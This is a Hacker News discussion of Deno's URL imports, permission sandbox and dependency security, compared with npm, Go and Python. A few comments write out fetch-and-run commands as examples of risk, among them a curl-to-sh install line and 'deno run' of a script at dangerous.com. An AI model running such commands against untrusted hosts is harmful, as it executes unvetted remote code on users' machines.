Hacker News new | past | comments | ask | show | jobs | submit login
Deno Is a Browser for Code (kitsonkelly.com)
276 points by beefman on May 28, 2020 | hide | past | favorite | 196 comments

Just for the kicks, I tried using deno for a task at my day job.

We had a need to extract records from a database into a textual format to be processed by other tools later. This is the typical task for a throwaway script which can be written in basically any scripting language. There is nothing in the task that called out for deno but I wanted to try it out and so I did.

I basically worked on the script iteratively, doing small changes, running it, checking the output, fixing things and running again. No bundler, no complex NPM tasks. Just a simple spaghetti JS and a single binary engine to run it. It was a very refreshing experience. Using URL imports was pretty nice, I really like working like that since my preferred JS environment is not NodeJS but the browser. I can see myself transitioning all those small tools and throwaway scripts I'd do in NodeJS to Deno.

People relying on NodeJS for servers and tooling for their client-side webapps might need to wait a bit longer, but for doing small tasks and scripts, I think it is quite ready and better than NodeJS IMHO. These are also good projects to give you a feel for the new runtime.

I've felt exactly that while testing Vite (https://github.com/vitejs/vite) this morning from Evan You, author of VueJS.

Standard install, nothing to configure, instant hot reload + modern code and tooling yet no perceivable latency for anything.

It felt like suddenly I could enjoy front end dev.

So I get the appeal of Deno.

But I know this ability to put arbitrary URLs as dependancies in the code are going to be terribly missused and abused.

I can see all the tutorials that will start including them, the bad architecture decisions that will spread them accross all files, the interns that will use localhost there, the typo and domain squatting or black SEO, the rise of people just telling you to put an URL from their site (the same that tell you to curl that bash script), the split from npm, the hardship of scanning/mapping/updating dependancies, the mismatch betwen running and installing bitting you, the undebuggable tickets because of proxies/antivirus/firewalls, the cloud hosting potential for failures, some twisted scenario leading to a DoS...

I know it will cause horrible technical debt down the road.

My spider dev sense is tickling and I'm not going to touch this tech for 5 years, until I either see my prediction unfold, and be completly disproved by its success (but I doubt it, I've been really good in the last 10 years at spotting bad technical choices).

There is a reason we have been using separation of concerns since the down of time. Declaring dependencies, installing them and importing them are 3 different concerns. They should not mix.

For the importing from URLs issue you mentioned, it would be good to ask Golang developers they’ve encountered the kind of technical debt you’re concerned about.

I’ve done some Go development, but not enough to really call myself a Go developer so I don’t think I’m qualified to comment one way or the other.

For what it’s worth, I stuck to a policy of only importing from GitHub and forking a repo if I really wanted be sure it would never disappear. If I were doing it today I’d probably expand my list acceptable import sources to include GitLab and Bitbucket as well.

I am not expert on Deno. But what other frameworks and browsers are doing is to include a hash in the URL. E.g. https://developer.mozilla.org/en-US/docs/Web/Security/Subres...

Should not Deno to force the same behaviour to ensure there is less attack surface thru dependencies? I see Deno is taking security seriously.

Sure, this will remove one problem: type/domain squatting.

All the other ones remain.

I can't wait for Stackoverflow spamming to get the scammers answer with a legit solution + url + hash at the top of Google search when typing the name of the package.

Before that, you'd install from npm.

But now, any URL is fair game.

I'll get the pop corn.

For small scripts there are many languages out there which are better, with a proper standard library and pre-installed runtimes in virtually every machine.

Why would someone want to use a new language and a new runtime in production scripts is beyond my understanding.

Just write Python for those. Even Perl, awk or sh would be better options, and that is saying something...

This is a bit like saying "why would someone take a ferrari to the corner store, a honda sedan works just fine". The implementation of the task at hand is without consequence, their boss just wants X to happen even if it gets done by hand. I love these opportunities because I can use a language that I'm not getting paid to write for the 99% of of my day job. Coincidentally this happens to be python for me but i'll defend parent's right to do it in brainfuck if it makes them smile :)

Well I can think of few. For one, if you are writing a script with external dependencies, it's more work than deno to distribute them.

For python, you would need pip. Can you install any script from arbitrary urls using pip?

I am not sure but I don't think you can. You also have to declare your deps for pip to figure out.

With deno, it's just deno run -A url to script since dependencies are declared in the code with their respective url or file location.

> Can you install any script from arbitrary urls using pip?

You don't need to. Download any module or packgage, put it next to your code, and you can import it. There is nothing to do. There is not even need for metadata.

But yes, pip can install packages from arbitrary URLS, including git repos, if they contains the right metadata.

What's more, with something like shiv (https://github.com/linkedin/shiv), you can actually bundle those dependancies into one zipapp (an official python feature, see https://docs.python.org/fr/3/library/zipapp.html), which is basically a zip containing your entire project that you can just execute like if it were one py file.

The whole point of Python is that you don't need external dependencies for "small tasks and scripts".

A production "script" requiring downloads of third-party code from external servers is already a red flag, by the way.

One could extend that logic to argue that all package managers are red flags: after all, you're downloading third-party code from external servers; you just happen to be doing it ahead of time, rather than at runtime.

In principle, there's no reason why the same supply-chain security mitigations npm and other package managers / repositories have put in place could not also be applied in this case: you just apply them at download time, same as before, except now it might result in a runtime error instead of an npm install failure. (No idea if deno does this in its current state, tbh.)

Agree, however, that blindly executing third-party code without somehow vetting it is a security risk.

Also, re: Python - there's a reason why libraries like requests exist; while the Python Standard Library is pretty comprehensive, the APIs it exposes are not always the most intuitive. You might be surprised at how often people pull in helper libraries to work around some of its warts - now, one could argue that maybe they shouldn't do that and should just know the built-in modules better, just as one could argue that functionality is useless unless combined with usability.

Package managers are not red flags, the packages, its vendors and procedures behind those are.

When you download a software update for your kernel you are trusting the Linux Foundation and your upstream vendor. They are supposed to have proper processes in place, they sign the binaries and may even have a support contract with you.

When you put a random URL as a dependency, you are just trusting some random person over the Internet not to screw it up.

Re: Python libraries. The topic of this thread was about "small scripts and tasks". The point of Python and its "batteries included" is that you don’t need external libraries to accomplish common tasks. It is a mistake to use external helper libraries in your scripts (not apps).

You can setup your own mirrors which don't update without audits. Any competent company would do.

And I wasn't implying that production scripts shouldn't be self contained. Just placing my 2 cents on why.

How is maintaining mirrors of third-party code any easier, reliable, secure or maintainable than just running Python?

Mind you, your Python runtime has been vetted by the Python Foundation, your upstream vendor and your company; is used by many other companies and does not require any network connections to run.

Go is my tool of choice for scripting now. Compiles fast and has an extensive standard library. I've tried using node in the past but all of the async handling turned me off. I prefer go's way of implementing concurrency with go routines.

Go isn’t scripting, it is compiled, which defeats the purpose.

`go run` is quite comparable to `deno run` and in fact inspired a great many of its details. Deno's standard library is literally built as a copy of Go's standard library. They work the same way in many respects, and with Go's type inference and (effectively) duck typed interfaces... If you are familiar with Go it is probably a more suitable scripting environment than most other languages for... scripting tasks.

Why does it being compiled defeat the purpose?

The point of scripts is to easily automate tasks without the need for a heavy infrastructure behind them in the target.

If you have to install/run a pipeline every time you modify them (like C or Rust or Go or TypeScript), or you need to sort out distribution (if you use binaries compiled in another machine), or it takes a long time to compile & run (like Rust or C++), or you need to install a heavy runtime (like a JVM or .NET or v8), it defeats the purpose.

Go can `go run script.go` without more ceremony than that. But there are other tradeoffs:


That compiles and then runs the resulting binary, so you still need the Go infrastructure and the latency.

Go is without doubt a better candidate for scripting than things like Rust or C++, but it cannot compete with the ubiquitous and featureful Python or built-in Unix tools (even more ubiquitous, but less featureful and quite dated).

To be clear, you need the infrastructure the first time you run it. If you run it _more_ than once, it will both start and execute faster than python.

> Go infrastructure Install go. Just Go

> latency Impercetible

I've written plenty of bash and python. Go is just better for me, if for no other reason, than the entire SDK is in my head as is the language

Python 2 or 3?

Both work.

1) Your distribution vendor most likely supports both and allows you to install both at the same time.

2) Your company has probably a policy for that.

3) Small Python scripts are trivial to make compatible with both major versions.

4) Python 2 is deprecated but supported. Just write Python 3 for new code.

Python 2 was EOL this year. Short answer should be just "Python 3" by now.

whichever one is on your computer

Sounds like that directly invalidates the use case of small portable scripts.

not really. its perfectly easy to write scripts that work with py2 and 3

Its very interesting to me the level of skepticism that is being shown towards Deno.

Whether or not you agree with the approach, you have to agree with the underlying problems that Deno is trying to solve. Furthermore I agree with the article in that there is a paradigm shift here, which should be given a chance.

I for one am happy about the url imports for a variety of reasons, but top on my list is that it will (in theory) reduce the total amount of code people are using from other sources, and (in theory) will make developers more aware of what they do choose to import. All of this should reduce bloat and award open source maintainers that solve novel problems in a clear & concise way.

There are better ways to reduce bloat. Gitlab can do web asset analysis and throw warning signs when your JS file goes over a certain size. Of course, in server-side applications the use-case would be different, but the idea remains the same: do not depend on developers doing the right thing every single day, depend on an automated system if something like this is crucial to you.

The URL import completely throws away all the goodies that great package managers have. Being able to manage sub-dependency versions is a big one. I do not understand how people are OK with throwing those away. Either they have never encountered issues that stem from dependencies or they just don't care.

Deno could technically add layers on top that make dependency management easier, but then we are back to NPM.

I recently did a bunch of nodejs work.

Ryan Dahl is the biggest reason I'm interested in deno. His post mortem for nodejs is spot on. He's intellectually honest, learns from experience. If he was a star ship captain (Sisko), I'd follow him into a black hole.

I felt the same way about Redis. But then I read antirez's writings and saw his source code. Redis is exactly what it says it is. And I love that.

PS- Took me forever to realize "deno" is an anagram of "node".

> Whether or not you agree with the approach, you have to agree with the underlying problems that Deno is trying to solve.

Perhaps, but that does not mean Deno is the solution.

> there is a paradigm shift here, which should be given a chance.

Why? If I come up with a novel approach for something, I am the one that has to show it works.

> I for one am happy about the url imports for a variety of reasons, but top on my list is that it will (in theory) reduce the total amount of code people are using from other sources

I'd say it is the other way around. It encourages an even crazier approach to dependencies that the NPM mess already is.

It's very interesting to me the level of enthusiasm being shown towards Deno. It is clearly being embraced more than it has shown its worth.

The key paragraph:

> The Deno CLI works like a browser, but for code. You import a URL in the code and Deno will go and fetch that code and cache it locally, just like a browser. Also, like a browser, your code runs in a sandbox, which has zero trust of the code you are running, irrespective of the source. You, the person invoking the code, get to tell that code what it can and can’t do, externally. Also, like a browser, code can ask you permission to do things, which you can choose to grant or deny.

The big problem with Deno is that permissions, once granted, apply to every imported URL. You cannot ask it to let one script access the file system, another access network and the rest of them run fully sandboxed. This makes it so that you either only import scripts you already fully trust (making the permission system useless) or don't allow any access (making the ecosystem useless).

To keep with the browser comparison: browsers have started to add tracking protection, and people are installing adblockers, because we've basically concluded that we don't want the websites we load to call out to arbitrary other websites, even if we do want them to call out to some.

That said, sounds like it's something they're thinking about:

> It is also hard to break down those permissions, to say “this code can do this, but this other code over here can’t” or when code prompts to escalate privileges where is that code coming from. Hopefully we can figure out an easy to use mechanism coupled with something that would be effective and performant at runtime to try to solve those challenges.

Except it's not a browser which never has file access, db access etc.... A MITM download in the browser affects a few users. A MITM download in Deno effects all users.

Let me tell you about IndexedDB and the File System API :)

Jokes aside, though, doesn't the MITM only affect users who run the MITM'd script, just like in the browser it only affects users who visit a MITM'd site?

... Just like every other software dependency system ever.

Would you please clarify what you are talking about? You grant permissions on a script by script basis. Your statement looks to me like the exact opposite of reality. What have I misunderstood?

I think you and the parent are working under different definitions of "script".

Deno allows you to grant permissions per top-level invocation. So if you have one program that you run by typing `deno run passwordmanager.js` at the console, and another program that you run by typing `deno run downloadfiles.js`, you can give different permissions to each of those "scripts".

But within one program, you can't (easily) give different permissions to different dependencies. If downloadfiles.js imports both http.js and check-if-number-is-even.js, and it wants http.js to be able to access the network, it has to request the access-the-network permission globally. So check-if-number-is-even.js would also be able to access the network. The different "script" files that make up one program all have to have the same permissions.

(Sure, Deno might have other ways to sandbox parts of your program, but so does Node -- Deno's permissions improvements don't really help you in that case.)

As someone unfamiliar with the ecosystem as a whole, is this not an issue similar to any sort of library that you run “in process”? Like, if you’re writing a mobile app and you manage to obtain location access, the Facebook SDK that you link against gets the same thing too?

Yes this is the common way computers work, but there's no reason to accept it. When today's process model was designed, there was no such thing as github or the internet. The idea of googling for a hunk of code and just pasting it into your app was ... not a thing on anyone's mind.

You might argue people are wrong to do that, but the fact is it's extremely popular. And if we redesign the security model, we can allow people to do it safely.

Imagine if leftpad.js had no privileges to anything, even if included in an application that has privileges to network, disk, etc.

The fact that something is popular in webdev does not make it right nor popular outside webdev.

In almost any other CS field you would be crazy to use non-vetted third-party code and depend on external service providers for your code to simply run.

I can only think of draconian DRM, which puts things in perspective...

It's popular everywhere. The Go ecosystem, or Rust ecosystem, as an example is just as bad about this as the JS ecosystem. There is a difference, but it's a constant factor. Asymptotically, everyone is just pasting code they found on the internet into their app. Crazy, but true.

That's why a per-library sandbox model seems so beneficial.

Loading classes over the network and running them in a configurable sandbox is what originally excited me about Java, but exploits were found and it's hardly ever used now.

I mean there will definitely be exploits.

It does still seem dramatically different to need to get an escape out of the js sandbox than to just be handed privileges by design.

Particularly if (in some glorious future) the js vm is written in a safe language, not C++.

The thing with the web is that vetting dependencies is (for the most part) very uncommon.

Some people are realizing it is not a good idea to download random code. So the solution proposed by Deno is to sandbox it and put a capabilities system into it, rather than create a culture of proper dependency management.

At least they are trying...

But since there is a VM anyways, It is fair to expect library sandboxing.

Could the solution just be to audit the permissions your dependencies require? Sure, it gets murkier with transitive deps like your http.js and number-is-even.js example, but I would argue that this scenario isn’t as dangerous as it seems because it adds an opportunity for the middle-man-dependency (http.js) to catch overreaching permissions.

With node, it is very opaque. With deno, as I see it, http.js can easily check the permissions for number-is-even.js, and you can easily check the permissions of http.js. It’s not perfect, but I think each link in the dependency chain is at least more easily auditable, even if it is not strictly more secure.

In my experience, auditable doesn't really matter. To have peace of mind you really need to be able to enforce that number-is-even.js will never do a http request.

I would seek to automate this audit and enforce it with a commit hook or CI stage or something

Doesn't solve the problem, but you can at least provide a whitelist of domains and filesystem paths.

For example, if you only whitelisted --allow-net=api.example.com, it would be a lot more annoying for a rogue dependency to exfiltrate data.

> ask it to let one script access the file system, another access network and the rest of them run fully sandboxed.

this is actually quite a difficult problem to solve. You're balancing the security needs with usability.

Browsers have an advantage on this aspect, because they can make the assumption that the webpage does not require filesystem access.

i think fully sandboxed OS-esque security model is the only way this can work. Like on android, where each app sees only their own filesystem, and app-to-app interaction is done via a permission based system that the user has to approve.

On android the apps has access to shared folders. For example my music player can scan and read files under /mnt/sdcard/Android/data/com.dropbox.android/files/

It maybe more isolated if it follows the nix file system model?

They could have maybe looked at E for some inspiration on how to solve the problem http://erights.org/

    const status = await Deno.permissions.revoke({ name: "run" });
    assert(status.state !== "granted")

    import * from "https://shady-site.com/this-file-cannot-run-processes.ts"

Though after that point even your own code cannot use that permission anymore.

It would be amazing if it had scoped permissions.

I think Ryan is aware of this as it has been raised in some ocasions already, but it might be too complicated or costly in dev time to have before a new version bump.

To the people who are skeptical of Deno, I would urge you to have patience and try it out. Deno is a young tool and it will take time to develop the features that you take for granted in other systems. But Deno gets a lot of things right. I already love using it day to day.

I remember using Node when it was this age and thinking it was the future, too. And it was. But as with Deno now, there were problems. In fact, Node was far worse in many ways. npm was extremely unstable back then, for example, which often made it impossible to use. Deno doesn't have that problem. Node had to create libraries from scratch and invent a ton of non-standard things along the way to do it. Deno is built on web standards but can also leverage many of the existing Node libraries by using std/node (the Node compatibility layer) or with jspm.io, for example. Yes, there's the occasional quirk or missing library, but it's already easy to be productive with Deno and it's a lot of fun.

> Node had to create libraries from scratch and invent a ton of non-standard things along the way to do it. Deno is built on web standards but can also leverage many of the existing Node libraries by using std/node (the Node compatibility layer) or with jspm.io, for example

Node.js is based on CommonJS [1] which defines the require() semantics for CommonJS/node.js modules as well as core libs/APIs such as JSGI (for express.js or node core http middleware) and others. When node.js was new, there were many JavaScript app server projects such as helma, v8cgi/TeaJS, and others, and CommonJS was very much a community effort.

[1]: http://wiki.commonjs.org/wiki/CommonJS

The inability to import (requires) modules using relative paths drove me nuts while using nodejs. I hope deno fixes that.

I think this is a good article, and worth the time to give it a read. When Deno was first announced I was not sold on this aspect of the system.

Over time though, and after having wrote a barely-above-trivial app in Deno. I've started to come to the conclusion that Deno's form of dependency management is a fresh perspective which ties closer to how browsers work and is a welcome simplification. The article covers a few ways that you can get production/reproducible builds out of the box which is usually people's first worry.


Odd that the article doesn’t mention Go. Deno works like Go. It’s slightly different in that Go added a system for version rewrites recently (“modules”), but other than that it’s the same, and if importmaps ever happen, it will be the exact same.

Also Deno has a command line fallback for its version of GOPATH, which is smart because it turns out a huge percentage of devs don’t know what env vars are or how to set them.

But other than cosmetic differences, it’s pretty much identical to Go.

> GOPATH, which is smart because it turns out a huge percentage of devs don’t know what env vars are or how to set them.

This gave me a laugh but it’s not fair! I’d guess most of the GOPATH outcry was the annoyance around managing automated and other non-dev environments.

Also at having to put your source in the gopath at its import path. So you couldn't have 'project/' and 'project2/', you had to have 'gopath1/src/path/to/project/' and 'gopath2/src/path/to/project2' or you had absolutely no isolation between things (until vendor (and that leaks (and it still requires that deep folder structure in some cases (and it took them quite a while to accept it in core tools)))).

GOPATH was nothing short of a monstrosity. Its problems were truly obvious on day 1, but it lingered and infected everything.

I don’t agree that it was a monstrosity. I do agree that developers didn’t like having to include “extra” folders. I think even just making a GOSRC var and dropping /src would have bought good will. (Go has a GOBIN.)

I still use this directory structure and it doesn't really bother me honestly. Makes it very easy to work with multiple local repositories without having to worry about any linking or installing bullshit you have to do with other systems.

It is certainly remarkable how long this is effective for in Golang. Libs just don't break.

Are you sure you aren't discussing lisp here? :)

THere is a subtle but significant difference between the approaches of Deno and Go.

Deno directly use standard URIs to import packages. Go imports syntactically appear as schemeless paths, which boils down to the semantics of importing URIs from an implicit private go:// scheme.

And that catches two fishes at once:

1) the go:// namespace is isomorphic to the https:// namespace, so the default resolution strategy is just to pipe through this isomorphism. This is convenient, makes sense right away and avoids the a priori need of a central registry.

2) Whenever it's needed, the resolution can be instructed to do some custom thing instead of casting to https://.

The exemplar instance of 2) is the usage of sibling packages. They wanted to make it possible to have several packages within a single module, whereby the module serves as a compilation unit. So when an import path is a subpath of the module path, then the package is looked up locally, relative from the root of the current module. There is no way you could get away with such a bending of a https:// URI. But go:// being a private scheme gives the freedom to proceed so.

(The go:// scheme is just my own literary device, but this semantics is explained clearly in simple terms at https://golang.org/doc/code.html.)

I've been skimming the arguments so I might have missed something big, but isn't the key distinction that Deno can take anything from a URL? Go's "go get" is backed by version control systems, but you could freely point your deno at "http://dangerous.com/evil.ts". I thought the concern was about the potentially problematic flexibility.

Isn't that the advantage though, that you can do exactly that without concern.

> deno run --allow-write=~/only-evil-here http://dangerous.com/evil.ts

Go has a system for telling where to fetch based on the URL response. You can basically send anything if you are evil, but Go modules keep a hash of seen content (what Deno calls a lockfile), so you’d notice that it changed.

Importmaps are available in deno behind an unstable flag. A few npm clones are using them.

You hardcode the dependency version in the actual URL string in JavaScript code? How in the world is that manageable? I run `npm update` once a week and it brings down a dozen or so updates (occasionally `npm outdated` as well with manual testing).

I bet we'll have a bunch of competing standards for "dependency management" in deno coming online really soon, because there's an obvious need for that.

Also, are dynamic dependencies a thing? Can I run some code to decide (at runtime) whether I import this.package or that.package? Holy hell... with test coverage the way it is in most projects, that's going to blow up really fast.

>I run `npm update` once a week and it brings down a dozen or so updates

That's my worst nightmare. This kind of thing always results in my having to spend hours figuring out which of the new updates broke everything and what do I have to do to fix it.

Once I have something working, I don't want updates to ever be installed unless I know 100% for sure that it is only fixing a security issue.

I never had that issue. But I had issues with native extensions often, a few years ago it occurred often enough that I would favor JS only if I could find an alternative. But I also avoid webpack because that always did break with updates, maybe now is more stable? Regardless, dependency management is hard. Every time I would do some c++ I would waste a lot of time just trying to get things to compile. Worst experience for me has been with iOS apps, I would make an app, wouldn’t need to touch it for a while and then I would have to update iOS version, which required a new Xcode version, which required a new Mac version, and then Swift’s API would have changed and things wouldn’t work. Dreadful. I guess my takeaway is that software rots fast

You can use automated testing to verify if your functionality is still there.

If that's too much work you can just deploy to a subset of your users (after npm audit) and let the error monitoring system tell you about the new exceptions.

I think it works fairly well for the use case of a scripting runtime instead of an application runtime. Consider a common command such as:

> curl -fsSL https://myapp.io/install.sh | sh

Thats pretty scary. It might do anything to user data. The deno sandbox would offer more assurances of course:

> deno run --allow-write=~/.myapp https://myapp.io/install.sh

You know it would only access what you expect. Same with another command:

> deno run --allow-read=./my-data.csv https://data-app-thing.io/visualize-data.ts my-data.csv

It's as described, a browser, not a server platform.

Please don’t compare Deno to NPM. This is all I see anytime Deno is mentioned, and often in some form of severe defensiveness.

If you need a million packages to write a tiny application Deno may not be your cup of tea. The entire article is about readjusting your expectations away from that kind of incompetence towards an alternative approach.

It's not incompetence; there's quite literally no other real solution. The sprawl of the npm ecosystem is a result of there being (essentially) no standard library in JavaScript and an intentionally small one in Node.js. As a result, simple problems have to be solved in userspace.

Your application can intentionally choose only to depend on a small number of libraries, but of course those libraries will need to consume other libraries, and so on, and you rapidly end up with hundreds of dependencies in node_modules.

If we wanted to solve this, we could introduce a comprehensive standard library. However, we'd need it to be bundled with every existing browser (and Node.js), which is likely why it hasn't happened.

The lack of a standard library is definitively a major factor and the way npm solves the Diamond Dependency Problem exacerbates the issue by an order of magnitude. Not only is everyone pulling in dozens of packages that do simple things, you also end up pulling in dozens of versions of each of those packages because package developers aren't forced to flatten their dependency trees. And since no one is forced to do do this, using something like 'yarn install --flat' yourself is a huge pain.

If we had a proper standard library and a sane package manager with flat dependency resolution by default, bundling just the parts of the standard library we need for the web would be easy (browserify has existed for a long time).

> The sprawl of the npm ecosystem is a result of there being (essentially) no standard library

You finish that statement with a phrase completely at odds with this part about no standard library. After having written applications using Node for a decade now I have learned to see the real problem is developers not wanting to write or own original code. No standard library will be comprehensive enough to fix that.

> You hardcode the dependency version in the actual URL

Websites have been doing this for .. 20 years?

It's quite a different paradigm, yes.

Before the age of React, when I used to work on decent-sized web sites' frontend, there would typically be maybe a handful of external dependencies; usually just jquery; and later on perhaps a few other powered-by-jquery utility that gives you maybe a carousel or other UI elements. Most of the rest of the JS code is written in-house.

Working with node backend in the past few years, most of my backend services typically list a dozen dependencies or so in package.json, and those in turn have a bunch of other dependencies of their own. Among these there's probably lodash, some schema validator (ajv/joi/etc.), maybe an xml parsing/building lib, some unit testing framework, db query builder, and so on.

I'm not saying this to be pro-node and attack deno or anything; I just feel like the statement of "websites/browsers have been doing this forever" isn't exactly an apples to apples comparison.

Websites have been doing this for .. 20 years?

Web developers have been trying to move away from that paradigm in order to make sites faster, more reliable, and smaller for almost as long.

Web developers have been trying to move away from URLs that describe their content for 20 years?

Well that certainly explains the state of the 'modern' web

Web developers have been trying to move away from URLs that describe their content for 20 years?

My comment wasn't about URLs describing their content, but rather the assumption that goes along with it that every network request will always work perfectly. Once you realise that things do actually fail occasionally you should realise that local caches and bundling things in to a smaller number of requests can improve resilience.

That's not really an issue with Deno because it does things to mitigate the issue (eg caching packages locally), but websites that loaded libraries using separate requests for each one were horribly prone to failure if one thing was missing, and slower overall if the browser couldn't fetch everything in parallel, so devs invented things like bundlers to fix the problem. Then came things like code-splitting and tree-shaking to reduce the size.

A major difference: transitive dependencies. In the old days, jquery.foo.bar.js would say “make sure you’ve loaded jquery.js and jquery.foo.js first”, and it would be up to you to decide which versions of them to use. Under Deno, modules will declare their exact dependencies and I suppose you the caller can’t control them. Or else they could devolve into some form of dependency injection.

This could lead to many copies of a library being loaded and included, rather than just one via deduplication as other packaging systems tend to do.

(The article talks about the potential need to remap dependencies, which could allow you to resolve this sort of duplication manually, but says that the current implementation should probably be avoided.)

You could for example just as well import * from 'unpkg.com/react' that handles the updating automatically since it always resolves to the latest version. You could just as well put a modifier to the url to specify you only want minor updates etc...

There are already more than few.

Personally I am a big fan of https://github.com/hayd/deno-udd

GitHub probably will have a dependency management for it. It already hosts most of the packages I guess

If they wanted to fix something on dependency management, they could have started by adding a way to sign the code/packages. Indeed browsers don't allow to sign pages, which means anyone from the hosting provider to the CDN to the mitm corporate proxy can inject any code they want. It sucks and I'm not sure why "Deno is a browser for code" seems to be a good thing....

Hopefully something like google signed http exchange will fix that in the future for browsers at least.

While not exactly what you are asking, SRI does address that issue to a certain extent


Does SRI allow signatures? I want to have a policy where any script signed by my Ed25519 key is valid, I don't want to have to hardcode the hash everywhere.

It doesn't, it's only for verifying that the thing is what it was when hashed and not who it's from. The funniest part of this discussion to me is that we're now discussing features of a, say it with me, a package manager! Only now we get to add them by hand.

To be honest, I am not sure what should be wrong with adding code by hand.

Libraries were added manually by legions of developers long before one thought he'd need to create a downloadable left-pad "package".

The whole package management issue is overrated.

That not, hence "not exactly" but SRI still is nice add-on.

Yes, the only missing thing is the page you initially download and contains all the hashes :)

Well, jQuery has the hashes on-site.

Unless I'm missing what you're referring to, that's not true at all - HTTPS is secure and uses certificates to sign and encrypt traffic.

I think OP is arguing:

- Host can change what is in a package at any time. In case Deno calculates a hash on your machine (e.g. package-lock.json), it's not as bad, but still without a signed package you can't be sure that it was the author that released the code in the first place.

- Host <-> CDN usually happens over HTTP. Often it is the CDN where HTTPS is terminated. Technically the CDN can deliver whatever code to you.

- Corporate HTTPS proxies exist. With a proxy like this, it can also replace the code with whatever it likes.

> In case Deno calculates a hash on your machine (e.g. package-lock.json), it's not as bad, but still without a signed package you can't be sure that it was the author that released the code in the first place.

If you trust the URL is in a (sub)domain controlled by the author and it's a HTTPS URL, that's as much guarantee as a signature.

HTTPS tells me that I am definitely downloading this package from GitHub. But what exactly am I downloading from GitHub? No clue.

I think they are referring to signed content, not singed transport. That is, this blob of content/code I downloaded is signed and I have more trust in it than in some other piece of content/code that's from a server meant to house hundreds or thousands of different people, much less modules.

You can trust that the developer meant to release that, and it's not some hack of the system, and you can also require that the code comes from a vetting third party that reviews all modules and updates and signs it itself (i.e. what Linux distro package managers do).

The two most frequent arguments against using URLs instead of npm packages seem to be: 1) Security: What if someone changes the code behind a URL? 2) Hard-coded versions in application code

I don't think these arguments are valid. For 1) you can always limit the URLs you use to hosts like jsDelivr or unpkg and reference npm packages directly. In this case instead of trusting only npm to send you the code you requested, you're now trusting the CDN as well. Potentially even better could be to import scripts from Github directly. For 2) a simple solution could be to have a deps.ts file for your project where you import from single-version URLs and export the dependency version-unaware. Now your versions are not scattered throughout your application code.

To me URLs seem like a nice (because compact and universal) interface for dependencies which allows decoupling your package management from your runtime.

So, in order to solve 1) and 2), we should return to what every other language does? That sounds like a design mistake...

What do you mean by "URLs are compact"? How can a URL be compact compared to the same URL in some sort of dependencies file? Unless you use the dependency once, of course, which is rare.

URLs and explicit versions in the import also encourage you to use several versions of the same dependency in your code, which is a very bad idea.

NPM’s model of referencing packages from central repositories is bad for many reasons proven over the years. But referencing GitHub scripts and arbitrary URLs is even worse.

URLs are compact as in a single string they specify everything you need to locate and use the dependency and you don't need any context, like a specific dependency manager (incl some sort of dependency file). I guess I mean compact as in self-contained, not necessarily short.

That’s fair and I’d agree it could be a useful property for scripts and even small apps if all code was trusted and all networks had perfectly availability.

Sadly, that is not the case, which is why I don’t see the advantage of going "the browser way" for local scripts.

The first time I dealt with dependencies written directly in code was with Groovy.

It wasn't a good idea back then, it wasn't a good idea in Go and it isn't definitly a good idea in Deno.

Care to explain why?

Because it ties the source code to the origin of the dependencies, forces code rewrites that don't scale across all dependencies and aren't enterprise friendly for using internal IT vetoed repositories.

Just because a dependency changed location I should not be obliged to touch a single character of the source code.

In the case of Groovy that OP mentioned, that's wrong. This is what it looks like in Groovy[1]:

@Grab(group='org.springframework', module='spring-orm', version='3.2.5.RELEASE') import org.springframework.jdbc.core.JdbcTemplate

This provides the dependency's coordinates... but not where it comes from.

You can define where it comes from by configuring Repositories (normally done by modifying the M2 settings file). This is how Java has always done it in Maven and Gradle, even Ant long time ago. And this works really well! Never seen anyone complaining about how that works.

[1] http://docs.groovy-lang.org/latest/html/documentation/grape....

I am the OP and you forgot this little detail,

    @GrabResolver(name='restlet', root='http://maven.restlet.org/')

No I didn't. This is if you WANT TO use a particular repo. Read the docs and you'll understand that.

Which breaks the script when that repo is no longer available.

The holy grail of package management is absence of packages and versions, but distribution via signature-addressable code.

In the end it’s all just functions that take arguments and return values. They should be the minimal unit of distribution. Potentially even with precompiled bytecode signed by some trusted compilation provider.

It's always fun to solve half of a problem perfectly and ignore the other half. But then you wonder why it doesn't take the world by storm. (Or sometimes it does, if you were pushy enough, and everyone has to live with your half-solution.)

The problem is not only about units of distribution, but also about units of interoperability. The unit should be a group of functions that share common types, naming conventions and design decisions, and have no weird edge cases when used together, unlike some mishmash cobbled together from the internet. In other words, a library. It's like Coase's "Nature of the firm": libraries exist to lower interoperability costs internally, same as firms exist to lower transaction costs internally.

The right size and version policy for libraries is a non-trivial question. I think the npm culture has settled on the wrong answer to that question, and that's why we end up with these complicated dependency trees.

You only think it needs to be this cohesive thing with types and global definitions and conventions because that’s the current way to approach software development. There is more than one way to do it.

In your code a library is completely ephemeral concept, it is only made concrete due to the fact that you have a reference to it in your package manager’s file. In your code however, that library is defined by functions you import and use. Do what stops you stripping the rest away? And if stripping is fine, what’s wrong with turning that upside down and just not having a concrete library as a unit of distribution? That set of functions can be built out of single repository and share a component in some unique reference scheme, but any subset of it is no less functional - each function still has a spec of what other functions it needs to do it’s job and those requirements are satisfied by your build system and everybody is happy.

As for types, in vast majority of circumstances you don’t need anything beyond what’s described in EDN spec, which is basically json but more sensible. And if you do need more types - you just require functions that produce and manipulate them and you refer to those types using that same uniquq reference scheme to describe your function signatures.

Removing unused code is a long solved problem. For example, when you compile and link a C program that uses a library, you can make the executable contain only the functions that you used, not the whole library. Similar tools exist for JS.

Exposed data isn't the only way functions interoperate. For example, a database library can give you an opaque connection object which you can pass to other code in the library. Sometimes that object will have parts that are visible to other code in the library, but not to you. Similarly, a UI library can give you UI objects that play nicely with other code in the library, and so on.

> For example, a database library can give you an opaque connection object which you can pass to other code in the library. Sometimes that object will have parts that are visible to other code in the library, but not to you. Similarly, a UI library can give you UI objects that play nicely with other code in the library, and so on.

Right, and all those objects are consumed by functions of that “library”, so you just refer to those functions in your import statements and have build system take care of fetching them for you. No reason to download every single artifact the library provides to achieve that.

Why bother with stripping if you can not bloat your app in the first place?

It's a non-problem. For example, three.js (a library that covers all your 3D rendering needs) is 600kb minified. You download it once and drop it in your project. Update it every month if you want, or keep using the same version, it won't break. Doesn't have any transitive dependencies either. If you don't need all its functionality, tree-shake your project at build time. A small set of such libraries can cover everything your project needs. The whole affair is trivial.

Though if you come from a "many small dependencies" culture, things look different. You'll try to cobble the same functionality from twenty libraries, each of which uses twenty others, and not the same versions. Soon you're asking for optimization - how to make download size smaller? How to build a whiz system for versioning and dependency resolution? Maybe some clever hashing and caching will help? But if you'd used a small set of comprehensive libraries from the start, none of that would be needed.

As i said from the very beginning - there is more than one way to do it. I'm not trying to convince you. Do whatever you're comfortable with.

Sounds like you want Unison: https://www.unisonweb.org/docs/tour/

